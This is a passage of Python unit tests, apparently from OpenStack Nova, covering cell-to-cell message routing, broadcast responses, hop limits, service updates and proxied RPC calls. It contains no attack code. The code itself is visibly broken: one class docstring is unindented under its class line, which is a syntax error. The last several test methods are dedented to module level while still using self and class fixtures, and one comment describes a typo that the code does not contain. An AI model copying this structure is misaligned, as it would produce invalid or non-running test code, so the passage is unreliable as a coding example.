        direction = 'down'
        call_info = {}

        def our_fake_method(message, **kwargs):
            call_info['context'] = message.ctxt
            call_info['routing_path'] = message.routing_path
            call_info['kwargs'] = kwargs

        fakes.stub_tgt_method(self, 'api-cell', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        tgt_message.process()
        self.assertEqual(self.ctxt, call_info['context'])
        self.assertEqual(method_kwargs, call_info['kwargs'])
        self.assertEqual(target_cell, call_info['routing_path'])

    def test_child_targeted_message(self):
        target_cell = 'api-cell!child-cell1'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        call_info = {}

        def our_fake_method(message, **kwargs):
            call_info['context'] = message.ctxt
            call_info['routing_path'] = message.routing_path
            call_info['kwargs'] = kwargs

        fakes.stub_tgt_method(self, 'child-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        tgt_message.process()
        self.assertEqual(self.ctxt, call_info['context'])
        self.assertEqual(method_kwargs, call_info['kwargs'])
        self.assertEqual(target_cell, call_info['routing_path'])

    def test_child_targeted_message_with_object(self):
        target_cell = 'api-cell!child-cell1'
        method = 'our_fake_method'
        direction = 'down'
        call_info = {}

        class CellsMsgingTestObject(objects_base.NovaObject):
            """Test object.  We just need 1 field in order to test
            that this gets serialized properly.
            """
            fields = {'test': objects_fields.StringField()}

        objects_base.NovaObjectRegistry.register(CellsMsgingTestObject)
        test_obj = CellsMsgingTestObject()
        test_obj.test = 'meow'
        method_kwargs = dict(obj=test_obj, arg1=1, arg2=2)

        def our_fake_method(message, **kwargs):
            call_info['context'] = message.ctxt
            call_info['routing_path'] = message.routing_path
            call_info['kwargs'] = kwargs

        fakes.stub_tgt_method(self, 'child-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        tgt_message.process()
        self.assertEqual(self.ctxt, call_info['context'])
        self.assertEqual(target_cell, call_info['routing_path'])
        self.assertEqual(3, len(call_info['kwargs']))
        self.assertEqual(1, call_info['kwargs']['arg1'])
        self.assertEqual(2, call_info['kwargs']['arg2'])
        # Verify we get a new object with what we expect.
        obj = call_info['kwargs']['obj']
        self.assertIsInstance(obj, CellsMsgingTestObject)
        self.assertNotEqual(id(test_obj), id(obj))
        self.assertEqual(test_obj.test, obj.test)

    def test_grandchild_targeted_message(self):
        target_cell = 'api-cell!child-cell2!grandchild-cell1'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        call_info = {}

        def our_fake_method(message, **kwargs):
            call_info['context'] = message.ctxt
            call_info['routing_path'] = message.routing_path
            call_info['kwargs'] = kwargs

        fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell)
        tgt_message.process()
        self.assertEqual(self.ctxt, call_info['context'])
        self.assertEqual(method_kwargs, call_info['kwargs'])
        self.assertEqual(target_cell, call_info['routing_path'])

    def test_grandchild_targeted_message_with_response(self):
        target_cell = 'api-cell!child-cell2!grandchild-cell1'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        call_info = {}

        def our_fake_method(message, **kwargs):
            call_info['context'] = message.ctxt
            call_info['routing_path'] = message.routing_path
            call_info['kwargs'] = kwargs
            return 'our_fake_response'

        fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        response = tgt_message.process()
        self.assertEqual(self.ctxt, call_info['context'])
        self.assertEqual(method_kwargs, call_info['kwargs'])
        self.assertEqual(target_cell, call_info['routing_path'])
        self.assertFalse(response.failure)
        self.assertEqual('our_fake_response', response.value_or_raise())

    def test_grandchild_targeted_message_with_error(self):
        target_cell = 'api-cell!child-cell2!grandchild-cell1'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method(message, **kwargs):
            raise test.TestingException('this should be returned')

        fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        response = tgt_message.process()
        self.assertTrue(response.failure)
        self.assertRaises(test.TestingException, response.value_or_raise)

    def test_grandchild_targeted_message_max_hops(self):
        self.flags(max_hop_count=2, group='cells')
        target_cell = 'api-cell!child-cell2!grandchild-cell1'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method(message, **kwargs):
            raise test.TestingException('should not be reached')

        fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
                              our_fake_method)
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        response = tgt_message.process()
        self.assertTrue(response.failure)
        self.assertRaises(exception.CellMaxHopCountReached,
                          response.value_or_raise)

    def test_targeted_message_invalid_cell(self):
        target_cell = 'api-cell!child-cell2!grandchild-cell4'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        response = tgt_message.process()
        self.assertTrue(response.failure)
        self.assertRaises(exception.CellRoutingInconsistency,
                          response.value_or_raise)

    def test_targeted_message_invalid_cell2(self):
        target_cell = 'unknown-cell!child-cell2'
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        tgt_message = messaging._TargetedMessage(self.msg_runner,
                                                 self.ctxt, method,
                                                 method_kwargs, direction,
                                                 target_cell,
                                                 need_response=True)
        response = tgt_message.process()
        self.assertTrue(response.failure)
        self.assertRaises(exception.CellRoutingInconsistency,
                          response.value_or_raise)

    def test_targeted_message_target_cell_none(self):
        target_cell = None
        method = 'our_fake_method'
        # NOTE: 'arg' was a typo for 'arg1' (see sibling tests); the kwargs
        # are never used here because construction raises first.
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        self.assertRaises(exception.CellRoutingInconsistency,
            messaging._TargetedMessage, self.msg_runner, self.ctxt, method,
            method_kwargs, direction, target_cell, need_response=False)

    def test_broadcast_routing(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        cells = set()

        def our_fake_method(message, **kwargs):
            cells.add(message.routing_path)

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=True)
        bcast_message.process()
        # fakes creates 8 cells (including ourself).
        self.assertEqual(8, len(cells))

    def test_broadcast_routing_up(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'up'
        msg_runner = fakes.get_message_runner('grandchild-cell3')
        cells = set()

        def our_fake_method(message, **kwargs):
            cells.add(message.routing_path)

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(msg_runner, self.ctxt,
                                                    method, method_kwargs,
                                                    direction,
                                                    run_locally=True)
        bcast_message.process()
        # Paths are reversed, since going 'up'
        expected = set(['grandchild-cell3', 'grandchild-cell3!child-cell3',
                        'grandchild-cell3!child-cell3!api-cell'])
        self.assertEqual(expected, cells)

    def test_broadcast_routing_without_ourselves(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'
        cells = set()

        def our_fake_method(message, **kwargs):
            cells.add(message.routing_path)

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=False)
        bcast_message.process()
        # fakes creates 8 cells (including ourself).  So we should see
        # only 7 here.
        self.assertEqual(7, len(cells))

    def test_broadcast_routing_with_response(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method(message, **kwargs):
            return 'response-%s' % message.routing_path

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=True,
                                                    need_response=True)
        responses = bcast_message.process()
        self.assertEqual(8, len(responses))
        for response in responses:
            self.assertFalse(response.failure)
            self.assertEqual('response-%s' % response.cell_name,
                             response.value_or_raise())

    def test_broadcast_routing_with_response_max_hops(self):
        self.flags(max_hop_count=2, group='cells')
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method(message, **kwargs):
            return 'response-%s' % message.routing_path

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=True,
                                                    need_response=True)
        responses = bcast_message.process()
        # Should only get responses from our immediate children (and
        # ourselves)
        self.assertEqual(5, len(responses))
        for response in responses:
            self.assertFalse(response.failure)
            self.assertEqual('response-%s' % response.cell_name,
                             response.value_or_raise())

    def test_broadcast_routing_with_all_erroring(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method(message, **kwargs):
            raise test.TestingException('fake failure')

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=True,
                                                    need_response=True)
        responses = bcast_message.process()
        self.assertEqual(8, len(responses))
        for response in responses:
            self.assertTrue(response.failure)
            self.assertRaises(test.TestingException, response.value_or_raise)

    def test_broadcast_routing_with_two_erroring(self):
        method = 'our_fake_method'
        method_kwargs = dict(arg1=1, arg2=2)
        direction = 'down'

        def our_fake_method_failing(message, **kwargs):
            raise test.TestingException('fake failure')

        def our_fake_method(message, **kwargs):
            return 'response-%s' % message.routing_path

        fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
        fakes.stub_bcast_method(self, 'child-cell2', 'our_fake_method',
                                our_fake_method_failing)
        fakes.stub_bcast_method(self, 'grandchild-cell3', 'our_fake_method',
                                our_fake_method_failing)
        bcast_message = messaging._BroadcastMessage(self.msg_runner,
                                                    self.ctxt, method,
                                                    method_kwargs,
                                                    direction,
                                                    run_locally=True,
                                                    need_response=True)
        responses = bcast_message.process()
        self.assertEqual(8, len(responses))
        failure_responses = [resp for resp in responses if resp.failure]
        success_responses = [resp for resp in responses if not resp.failure]
        self.assertEqual(2, len(failure_responses))
        self.assertEqual(6, len(success_responses))
        for response in success_responses:
            self.assertFalse(response.failure)
            self.assertEqual('response-%s' % response.cell_name,
                             response.value_or_raise())
        for response in failure_responses:
            self.assertIn(response.cell_name, ['api-cell!child-cell2',
                    'api-cell!child-cell3!grandchild-cell3'])
            self.assertTrue(response.failure)
            self.assertRaises(test.TestingException, response.value_or_raise)
class CellsTargetedMethodsWithDatabaseTestCase(test.TestCase):
    """These tests access the database unlike the others."""

    def setUp(self):
        super(CellsTargetedMethodsWithDatabaseTestCase, self).setUp()
        fakes.init(self)
        self.ctxt = context.RequestContext('fake', 'fake')
        self._setup_attrs('api-cell', 'api-cell!child-cell2')

    def _setup_attrs(self, source_cell, target_cell):
        # Source cell sends the message; target is the full routing path.
        self.src_msg_runner = fakes.get_message_runner(source_cell)
        self.tgt_cell_name = target_cell

    def test_service_delete(self):
        """A targeted service_delete removes the service row."""
        service_values = {'id': 42,
                          'host': 'fake_host',
                          'binary': 'nova-compute',
                          'topic': 'compute'}
        admin_ctxt = self.ctxt.elevated()
        db.service_create(admin_ctxt, service_values)
        self.src_msg_runner.service_delete(
                admin_ctxt, self.tgt_cell_name, service_values['id'])
        # The record should be gone from the database now.
        self.assertRaises(exception.ServiceNotFound,
                          db.service_get, admin_ctxt, service_values['id'])
class CellsTargetedMethodsTestCase(test.NoDBTestCase):
"""Test case for _TargetedMessageMethods class. Most of these
tests actually test the full path from the MessageRunner through
to the functionality of the message method. Hits 2 birds with 1
stone, even though it's a little more than a unit test.
"""
    def setUp(self):
        """Build the fake cell topology and target 'api-cell!child-cell2'."""
        super(CellsTargetedMethodsTestCase, self).setUp()
        fakes.init(self)
        self.ctxt = context.RequestContext('fake', 'fake')
        self._setup_attrs('api-cell', 'api-cell!child-cell2')
    def _setup_attrs(self, source_cell, target_cell):
        """Wire up the source message runner and target-side references.

        The source runner sends targeted messages; the tgt_* attributes
        expose the target cell's internals so tests can stub and verify
        what the message ultimately invokes.
        """
        self.tgt_cell_name = target_cell
        self.src_msg_runner = fakes.get_message_runner(source_cell)
        self.src_state_manager = self.src_msg_runner.state_manager
        # The target's short name is the last hop of the routing path.
        tgt_shortname = target_cell.split('!')[-1]
        self.tgt_cell_mgr = fakes.get_cells_manager(tgt_shortname)
        self.tgt_msg_runner = self.tgt_cell_mgr.msg_runner
        self.tgt_scheduler = self.tgt_msg_runner.scheduler
        self.tgt_state_manager = self.tgt_msg_runner.state_manager
        methods_cls = self.tgt_msg_runner.methods_by_type['targeted']
        self.tgt_methods_cls = methods_cls
        self.tgt_compute_api = methods_cls.compute_api
        self.tgt_host_api = methods_cls.host_api
        self.tgt_db_inst = methods_cls.db
        self.tgt_c_rpcapi = methods_cls.compute_rpcapi
    def test_build_instances(self):
        """Targeted build_instances reaches the target cell's scheduler."""
        build_inst_kwargs = {'filter_properties': {},
                             'key1': 'value1',
                             'key2': 'value2'}
        self.mox.StubOutWithMock(self.tgt_scheduler, 'build_instances')
        self.tgt_scheduler.build_instances(self.ctxt, build_inst_kwargs)
        self.mox.ReplayAll()
        self.src_msg_runner.build_instances(self.ctxt, self.tgt_cell_name,
                build_inst_kwargs)
    def _run_compute_api_method(self, method_name):
        """Helper: route a compute-api call to the target cell and verify
        both the instance lookup and the compute-api method invocation.
        """
        instance = fake_instance.fake_instance_obj(self.ctxt)
        method_info = {'method': method_name,
                       'method_args': (instance.uuid, 2, 3),
                       'method_kwargs': {'arg1': 'val1', 'arg2': 'val2'}}
        # Attributes the target side loads along with the instance.
        expected_attrs = ['metadata', 'system_metadata', 'security_groups',
                          'info_cache']
        @mock.patch.object(self.tgt_compute_api, method_name,
                           return_value='fake-result')
        @mock.patch.object(objects.Instance, 'get_by_uuid',
                           return_value=instance)
        def run_method(mock_get_by_uuid, mock_method):
            response = self.src_msg_runner.run_compute_api_method(
                    self.ctxt,
                    self.tgt_cell_name,
                    method_info,
                    True)
            result = response.value_or_raise()
            self.assertEqual('fake-result', result)
            mock_get_by_uuid.assert_called_once_with(self.ctxt, instance.uuid,
                    expected_attrs=expected_attrs)
            # The uuid arg is replaced by the loaded instance object.
            mock_method.assert_called_once_with(self.ctxt, instance, 2, 3,
                                                arg1='val1', arg2='val2')
        run_method()
    def test_run_compute_api_method_expects_obj(self):
        """The uuid argument is converted to an Instance object."""
        # Run compute_api start method
        self._run_compute_api_method('start')
    def test_run_compute_api_method_shelve_with_info_cache(self):
        """Shelve also works; it needs info_cache/metadata on the object."""
        # Run compute_api shelve method as it requires info_cache and
        # metadata to be present in instance object
        self._run_compute_api_method('shelve')
    def test_run_compute_api_method_unknown_instance(self):
        """An unknown instance triggers instance_destroy_at_top and the
        InstanceNotFound error is returned to the caller.
        """
        # Unknown instance should send a broadcast up that instance
        # is gone.
        instance = fake_instance.fake_instance_obj(self.ctxt)
        instance_uuid = instance.uuid
        method_info = {'method': 'reboot',
                       'method_args': (instance_uuid, 2, 3),
                       'method_kwargs': {'arg1': 'val1', 'arg2': 'val2'}}
        self.mox.StubOutWithMock(objects.Instance, 'get_by_uuid')
        self.mox.StubOutWithMock(self.tgt_msg_runner,
                                 'instance_destroy_at_top')
        objects.Instance.get_by_uuid(self.ctxt, instance.uuid,
                expected_attrs=['metadata', 'system_metadata',
                                'security_groups', 'info_cache']).AndRaise(
                        exception.InstanceNotFound(instance_id=instance_uuid))
        self.tgt_msg_runner.instance_destroy_at_top(self.ctxt,
                                                    mox.IsA(objects.Instance))
        self.mox.ReplayAll()
        response = self.src_msg_runner.run_compute_api_method(
                self.ctxt,
                self.tgt_cell_name,
                method_info,
                True)
        self.assertRaises(exception.InstanceNotFound,
                          response.value_or_raise)
    def test_update_capabilities(self):
        """Child's capabilities propagate up and are re-told to parents."""
        # Route up to API
        self._setup_attrs('child-cell2', 'child-cell2!api-cell')
        capabs = {'cap1': set(['val1', 'val2']),
                  'cap2': set(['val3'])}
        # The list(set([])) seems silly, but we can't assume the order
        # of the list...  This behavior should match the code we're
        # testing... which is check that a set was converted to a list.
        expected_capabs = {'cap1': list(set(['val1', 'val2'])),
                           'cap2': ['val3']}
        self.mox.StubOutWithMock(self.src_state_manager,
                                 'get_our_capabilities')
        self.mox.StubOutWithMock(self.tgt_state_manager,
                                 'update_cell_capabilities')
        self.mox.StubOutWithMock(self.tgt_msg_runner,
                                 'tell_parents_our_capabilities')
        self.src_state_manager.get_our_capabilities().AndReturn(capabs)
        self.tgt_state_manager.update_cell_capabilities('child-cell2',
                                                        expected_capabs)
        # Target re-broadcasts upward after updating its own view.
        self.tgt_msg_runner.tell_parents_our_capabilities(self.ctxt)
        self.mox.ReplayAll()
        self.src_msg_runner.tell_parents_our_capabilities(self.ctxt)
    def test_update_capacities(self):
        """Child's capacities propagate up and are re-told to parents."""
        self._setup_attrs('child-cell2', 'child-cell2!api-cell')
        capacs = 'fake_capacs'
        self.mox.StubOutWithMock(self.src_state_manager,
                                 'get_our_capacities')
        self.mox.StubOutWithMock(self.tgt_state_manager,
                                 'update_cell_capacities')
        self.mox.StubOutWithMock(self.tgt_msg_runner,
                                 'tell_parents_our_capacities')
        self.src_state_manager.get_our_capacities().AndReturn(capacs)
        self.tgt_state_manager.update_cell_capacities('child-cell2',
                                                      capacs)
        self.tgt_msg_runner.tell_parents_our_capacities(self.ctxt)
        self.mox.ReplayAll()
        self.src_msg_runner.tell_parents_our_capacities(self.ctxt)
    def test_announce_capabilities(self):
        """Asking children for capabilities makes them tell their parents."""
        self._setup_attrs('api-cell', 'api-cell!child-cell1')
        # To make this easier to test, make us only have 1 child cell.
        cell_state = self.src_state_manager.child_cells['child-cell1']
        self.src_state_manager.child_cells = {'child-cell1': cell_state}
        self.mox.StubOutWithMock(self.tgt_msg_runner,
                                 'tell_parents_our_capabilities')
        self.tgt_msg_runner.tell_parents_our_capabilities(self.ctxt)
        self.mox.ReplayAll()
        self.src_msg_runner.ask_children_for_capabilities(self.ctxt)
    def test_announce_capacities(self):
        """Asking children for capacities makes them tell their parents."""
        self._setup_attrs('api-cell', 'api-cell!child-cell1')
        # To make this easier to test, make us only have 1 child cell.
        cell_state = self.src_state_manager.child_cells['child-cell1']
        self.src_state_manager.child_cells = {'child-cell1': cell_state}
        self.mox.StubOutWithMock(self.tgt_msg_runner,
                                 'tell_parents_our_capacities')
        self.tgt_msg_runner.tell_parents_our_capacities(self.ctxt)
        self.mox.ReplayAll()
        self.src_msg_runner.ask_children_for_capacities(self.ctxt)
    def test_service_get_by_compute_host(self):
        """Targeted service lookup returns the target cell's service."""
        fake_host_name = 'fake-host-name'
        self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
        objects.Service.get_by_compute_host(self.ctxt,
                fake_host_name).AndReturn('fake-service')
        self.mox.ReplayAll()
        response = self.src_msg_runner.service_get_by_compute_host(
                self.ctxt,
                self.tgt_cell_name,
                fake_host_name)
        result = response.value_or_raise()
        self.assertEqual('fake-service', result)
    def test_service_update(self):
        """Targeted service_update saves the service and returns it."""
        binary = 'nova-compute'
        params_to_update = {'disabled': True, 'report_count': 13}
        fake_service = objects.Service(id=42, host='fake_host',
                                       binary='nova-compute',
                                       topic='compute')
        fake_service.compute_node = objects.ComputeNode(id=1, host='fake_host')
        self.mox.StubOutWithMock(objects.Service, 'get_by_args')
        self.mox.StubOutWithMock(objects.Service, 'save')
        objects.Service.get_by_args(
            self.ctxt, 'fake_host', 'nova-compute').AndReturn(fake_service)
        fake_service.save()
        self.mox.ReplayAll()
        response = self.src_msg_runner.service_update(
            self.ctxt, self.tgt_cell_name,
            'fake_host', binary, params_to_update)
        result = response.value_or_raise()
        self.assertIsInstance(result, objects.Service)
        # Round-tripped object should have the same primitive fields.
        self.assertTrue(objects_base.obj_equal_prims(fake_service, result))
    def test_proxy_rpc_to_manager_call(self):
        """Proxied RPC with want-reply uses client.call() with a timeout."""
        fake_topic = 'fake-topic'
        fake_rpc_message = {'method': 'fake_rpc_method', 'args': {}}
        fake_host_name = 'fake-host-name'
        self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
        objects.Service.get_by_compute_host(self.ctxt, fake_host_name)
        target = oslo_messaging.Target(topic='fake-topic')
        rpcclient = self.mox.CreateMockAnything()
        self.mox.StubOutWithMock(rpc, 'get_client')
        rpc.get_client(target).AndReturn(rpcclient)
        # The caller-supplied timeout must be applied via prepare().
        rpcclient.prepare(timeout=5).AndReturn(rpcclient)
        rpcclient.call(mox.IgnoreArg(),
                       'fake_rpc_method').AndReturn('fake_result')
        self.mox.ReplayAll()
        response = self.src_msg_runner.proxy_rpc_to_manager(
                self.ctxt,
                self.tgt_cell_name,
                fake_host_name,
                fake_topic,
                fake_rpc_message, True, timeout=5)
        result = response.value_or_raise()
        self.assertEqual('fake_result', result)
    def test_proxy_rpc_to_manager_cast(self):
        """Proxied RPC without want-reply uses client.cast()."""
        fake_topic = 'fake-topic'
        fake_rpc_message = {'method': 'fake_rpc_method', 'args': {}}
        fake_host_name = 'fake-host-name'
        self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
        objects.Service.get_by_compute_host(self.ctxt, fake_host_name)
        target = oslo_messaging.Target(topic='fake-topic')
        rpcclient = self.mox.CreateMockAnything()
        self.mox.StubOutWithMock(rpc, 'get_client')
        rpc.get_client(target).AndReturn(rpcclient)
        rpcclient.cast(mox.IgnoreArg(), 'fake_rpc_method')
        self.mox.ReplayAll()
        self.src_msg_runner.proxy_rpc_to_manager(
                self.ctxt,
                self.tgt_cell_name,
                fake_host_name,
                fake_topic,
                fake_rpc_message, False, timeout=None)
    def test_task_log_get_all_targeted(self):
        """Targeted task_log_get_all returns a one-element response list."""
        task_name = 'fake_task_name'
        begin = 'fake_begin'
        end = 'fake_end'
        host = 'fake_host'
        state = 'fake_state'
        self.mox.StubOutWithMock(self.tgt_db_inst, 'task_log_get_all')
        self.tgt_db_inst.task_log_get_all(self.ctxt, task_name,
                begin, end, host=host,
                state=state).AndReturn(['fake_result'])
        self.mox.ReplayAll()
        response = self.src_msg_runner.task_log_get_all(self.ctxt,
                self.tgt_cell_name, task_name, begin, end, host=host,
                state=state)
        # Targeted variant still returns a list of responses (one cell).
        self.assertIsInstance(response, list)
        self.assertEqual(1, len(response))
        result = response[0].value_or_raise()
        self.assertEqual(['fake_result'], result)
    def test_compute_node_get(self):
        """Targeted compute_node_get proxies ComputeNode.get_by_id."""
        compute_id = 'fake-id'
        self.mox.StubOutWithMock(objects.ComputeNode, 'get_by_id')
        objects.ComputeNode.get_by_id(self.ctxt,
                                      compute_id).AndReturn('fake_result')
        self.mox.ReplayAll()
        response = self.src_msg_runner.compute_node_get(self.ctxt,
                self.tgt_cell_name, compute_id)
        result = response.value_or_raise()
        self.assertEqual('fake_result', result)
    def test_actions_get(self):
        """Targeted actions_get returns JSON-primitive action records."""
        fake_uuid = fake_server_actions.FAKE_UUID
        fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
        fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
        self.mox.StubOutWithMock(self.tgt_db_inst, 'actions_get')
        self.tgt_db_inst.actions_get(self.ctxt,
                                     'fake-uuid').AndReturn([fake_act])
        self.mox.ReplayAll()
        response = self.src_msg_runner.actions_get(self.ctxt,
                                                   self.tgt_cell_name,
                                                   'fake-uuid')
        result = response.value_or_raise()
        self.assertEqual([jsonutils.to_primitive(fake_act)], result)
    def test_action_get_by_request_id(self):
        """Targeted lookup of a single action by request id round-trips."""
        fake_uuid = fake_server_actions.FAKE_UUID
        fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
        fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
        self.mox.StubOutWithMock(self.tgt_db_inst, 'action_get_by_request_id')
        self.tgt_db_inst.action_get_by_request_id(self.ctxt,
                'fake-uuid', 'req-fake').AndReturn(fake_act)
        self.mox.ReplayAll()
        response = self.src_msg_runner.action_get_by_request_id(self.ctxt,
                self.tgt_cell_name, 'fake-uuid', 'req-fake')
        result = response.value_or_raise()
        self.assertEqual(jsonutils.to_primitive(fake_act), result)
    def test_action_events_get(self):
        """Targeted action_events_get returns JSON-primitive event list."""
        fake_action_id = fake_server_actions.FAKE_ACTION_ID1
        fake_events = fake_server_actions.FAKE_EVENTS[fake_action_id]
        self.mox.StubOutWithMock(self.tgt_db_inst, 'action_events_get')
        self.tgt_db_inst.action_events_get(self.ctxt,
                                           'fake-action').AndReturn(fake_events)
        self.mox.ReplayAll()
        response = self.src_msg_runner.action_events_get(self.ctxt,
                                                         self.tgt_cell_name,
                                                         'fake-action')
        result = response.value_or_raise()
        self.assertEqual(jsonutils.to_primitive(fake_events), result)
    def test_validate_console_port(self):
        """Targeted console-port validation loads the instance and calls
        the compute RPC API on the target cell.
        """
        instance_uuid = 'fake_instance_uuid'
        instance = objects.Instance(uuid=instance_uuid)
        console_port = 'fake-port'
        console_type = 'fake-type'
        @mock.patch.object(objects.Instance, 'get_by_uuid',
                           return_value=instance)
        @mock.patch.object(self.tgt_c_rpcapi, 'validate_console_port',
                           return_value='fake_result')
        def do_test(mock_validate, mock_get):
            response = self.src_msg_runner.validate_console_port(self.ctxt,
                    self.tgt_cell_name, instance_uuid, console_port,
                    console_type)
            result = response.value_or_raise()
            self.assertEqual('fake_result', result)
            mock_get.assert_called_once_with(self.ctxt, instance_uuid)
            mock_validate.assert_called_once_with(self.ctxt, instance,
                                                  console_port, console_type)
        do_test()
    def test_get_migrations_for_a_given_cell(self):
        """Migrations filtered for a valid target cell come back intact."""
        filters = {'cell_name': 'child-cell2', 'status': 'confirmed'}
        migrations_in_progress = [{'id': 123}]
        self.mox.StubOutWithMock(self.tgt_compute_api,
                                 'get_migrations')
        self.tgt_compute_api.get_migrations(self.ctxt, filters).\
            AndReturn(migrations_in_progress)
        self.mox.ReplayAll()
        responses = self.src_msg_runner.get_migrations(
                self.ctxt,
                self.tgt_cell_name, False, filters)
        result = responses[0].value_or_raise()
        self.assertEqual(migrations_in_progress, result)
    def test_get_migrations_for_an_invalid_cell(self):
        """An unroutable cell name yields no responses at all."""
        filters = {'cell_name': 'invalid_Cell', 'status': 'confirmed'}
        responses = self.src_msg_runner.get_migrations(
                self.ctxt,
                'api_cell!invalid_cell', False, filters)
        self.assertEqual(0, len(responses))
def test_call_compute_api_with_obj(self):
    """_call_compute_api_with_obj refreshes the instance object and then
    forwards args/kwargs to the named compute API method, returning its
    result.
    """
    instance = objects.Instance()
    instance.uuid = uuidutils.generate_uuid()
    self.mox.StubOutWithMock(instance, 'refresh')
    # Using 'snapshot' for this test, because it
    # takes args and kwargs.
    self.mox.StubOutWithMock(self.tgt_compute_api, 'snapshot')
    # refresh() must happen before the compute API call.
    instance.refresh()
    self.tgt_compute_api.snapshot(
            self.ctxt, instance, 'name',
            extra_properties='props').AndReturn('foo')
    self.mox.ReplayAll()
    result = self.tgt_methods_cls._call_compute_api_with_obj(
            self.ctxt, instance, 'snapshot', 'name',
            extra_properties='props')
    self.assertEqual('foo', result)
def test_call_compute_api_with_obj_no_cache(self):
    """InstanceInfoCacheNotFound raised by refresh() propagates for
    non-delete compute API methods.
    """
    instance = objects.Instance()
    instance.uuid = uuidutils.generate_uuid()
    exc = exception.InstanceInfoCacheNotFound(instance_uuid=instance.uuid)
    with mock.patch.object(instance, 'refresh', side_effect=exc):
        self.assertRaises(exception.InstanceInfoCacheNotFound,
                          self.tgt_methods_cls._call_compute_api_with_obj,
                          self.ctxt, instance, 'snapshot')
def test_call_delete_compute_api_with_obj_no_cache(self):
    """'delete' is special-cased: a missing info cache during refresh()
    must not prevent the delete from reaching the compute API.
    """
    instance = objects.Instance()
    instance.uuid = uuidutils.generate_uuid()
    error = exception.InstanceInfoCacheNotFound(
            instance_uuid=instance.uuid)
    with test.nested(
            mock.patch.object(instance, 'refresh',
                              side_effect=error),
            mock.patch.object(self.tgt_compute_api, 'delete')) as (inst,
                                                                   delete):
        self.tgt_methods_cls._call_compute_api_with_obj(self.ctxt,
                                                        instance,
                                                        'delete')
        delete.assert_called_once_with(self.ctxt, instance)
def test_call_compute_with_obj_unknown_instance(self):
    """If refresh() reports the instance is gone, a destroy is broadcast
    to the top cell and InstanceNotFound is re-raised to the caller.
    """
    instance = objects.Instance()
    instance.uuid = uuidutils.generate_uuid()
    instance.vm_state = vm_states.ACTIVE
    instance.task_state = None
    self.mox.StubOutWithMock(instance, 'refresh')
